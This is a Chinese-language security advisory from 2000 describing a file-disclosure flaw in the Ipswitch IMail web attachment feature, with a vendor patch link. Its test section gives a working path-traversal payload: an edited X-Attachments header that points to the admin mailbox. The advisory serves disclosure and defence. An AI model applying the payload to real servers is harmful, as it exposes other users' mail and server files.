首页 -> 安全研究

安全研究

安全漏洞
IPSWITCH IMail 附件漏洞

发布日期:2000-08-31
更新日期:2000-08-31

受影响系统:

    Ipswitch IMail 6.4
    Ipswitch IMail 6.3
    Ipswitch IMail 6.2
       - Microsoft Windows NT 4.0
       - Microsoft Windows NT 2000
    Ipswitch IMail 6.1
       - Microsoft Windows NT 4.0
    Ipswitch IMail 6.0
       - Microsoft Windows NT 4.0
       - Microsoft Windows NT 3.5.1
描述:

IMail是一个NT系统上的邮件系统,允许客户端通过WWW界面使用这个邮件系统,
Ipswitch是其中一部分。IMail Server通常在8383端口上提供一个WWW服务,用户通
过这个端口使用邮件系统,可以收发邮件,包括附件。然而某些版本的IMail Server
在实现附件功能的时候,错误地允许用户访问到服务器方的文件,而这些文件本来是
无权访问的。IMail Server以什么身份运行,最终用户就拥有什么样的权限访问位于
服务器上的文件,通常是系统权限。值得注意的是,一旦最终用户选择了位于服务器
上的附件,服务器会删除他们。

<* 来源:Timescape (vellad@kattare.com) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


下面是一个简单的IMail Server发送出去的邮件头,它有一个附件,请注意例子折行
显示了。

Date: Tue, 11 Jul 2000 13:10:28 +0200
Message-ID: <200007111310.AA2374238664@bar.com>
MIME-Version: 1.0 Content-Type: multipart/mixed;
boundary="==IMail_v5.0=="
From: "Timescape" <foo@bar.com>
Reply-To: <foo@bar.com>
To: <foo@bar.com>
Subject: nsfocus-test
X-Mailer: <IMail v5.01>
X-Attachments: D:\IMAIL\spool\gonzo2.jpg ;
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Return-Path: <foo@bar.com>
X-OriginalArrivalTime: 11 Jul 2000 11:20:48.0256 (UTC) FILETIME=[10327800:01BFEB2A]

下面是以MIME格式表示的邮件部分。

--==IMail_v5.0==
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

--==IMail_v5.0==
Content-Type: application/octet-stream;
name="gonzo2.jpg "
Content-Transfer-Encoding: base64

--==IMail_v5.0==--

注意到这一行
X-Attachments: D:\IMAIL\spool\gonzo2.jpg ;

修改这一行成
X-Attachments: D:\IMAIL\spool\..\bar\users\admin\main.mbx ;
并保存在服务器上,然后收取这封邮件。


建议:

更新到新版本:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/Imail/imailwebpatch604c.exe



浏览次数:6327
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障